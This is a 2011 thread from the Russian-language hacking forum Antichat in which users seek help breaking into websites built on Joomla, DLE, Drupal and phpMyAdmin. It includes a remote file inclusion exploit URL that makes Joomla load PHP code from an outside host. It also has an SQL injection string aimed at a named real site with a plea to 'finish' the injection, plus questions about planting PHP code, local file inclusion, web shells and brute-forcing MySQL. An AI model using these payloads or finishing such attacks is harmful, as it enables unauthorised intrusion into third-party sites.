ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.09.2011, 03:04
|
|
Познающий
Регистрация: 02.02.2011
Сообщений: 63
Провел на форуме:
13201
Репутация:
17
|
|
Сообщение от Severyna
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
Хотя уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии.
Попробуй в компонентах баги поищи
|
|
|
23.09.2011, 21:50
|
|
Новичок
Регистрация: 22.09.2011
Сообщений: 1
Провел на форуме:
345
Репутация:
0
|
|
http://tosnoshield.ru
http://tosnoshield.ru//index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Можете помочь скуль доделать?
|
|
|
|
24.09.2011, 01:12
|
|
Познающий
Регистрация: 24.09.2010
Сообщений: 84
Провел на форуме:
22681
Репутация:
0
|
|
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..
пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...
с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
|
|
|
|
30.09.2011, 00:22
|
|
Новичок
Регистрация: 27.08.2011
Сообщений: 24
Провел на форуме:
8471
Репутация:
1
|
|
Как узнавать дижок сайта , и версию?
|
|
|
|
30.10.2011, 22:36
|
|
Новичок
Регистрация: 29.10.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
подскажите какие уязвимости есть в phpmyadmin 3.4.3.1 если можно поподробнее что можно придумать....
|
|
|
|
30.10.2011, 22:43
|
|
Новичок
Регистрация: 29.10.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от ~{OmRus}~
Как узнавать дижок сайта , и версию?
/showthread.php?t=141298
/showthread.php?t=231084
|
|
|
|
21.11.2011, 19:32
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:
Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно. |
|
|
|
22.11.2011, 14:30
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Aniweste
Здравствуйте. Нарвался на старую уязвимость в Dle , версии 8.2 . Почитав форум и просмотрев видео не смог понять как именно сформировать LFI. Дошёл только до вывода раскрытия путей:
Скажите - можно ли что-нибудь ещё сделать? Либо это предел? Прошу помочь, если не сложно. Сам по себе вывод путей ничего не даёт, кроме абсолютного пути для возможного шелла.
|
|
|
|
01.12.2011, 01:12
|
|
Новичок
Регистрация: 23.11.2011
Сообщений: 11
Провел на форуме:
2353
Репутация:
0
|
|
Drupal
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
|
|
|
|
04.12.2011, 23:37
|
|
Новичок
Регистрация: 23.11.2011
Сообщений: 11
Провел на форуме:
2353
Репутация:
0
|
|
Сообщение от medoxx
Детали: сайт на drupal 5.6/7, install.php в свободном доступе, имя базы данных и пользователь - известны.
Вопрос: Можно задействовать только брутфорс mysql или же есть другой вариант получить доступ?
Пожалуйста, по существу...
АУУУУ ЕСТЬ КТО ЖИВОЙ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
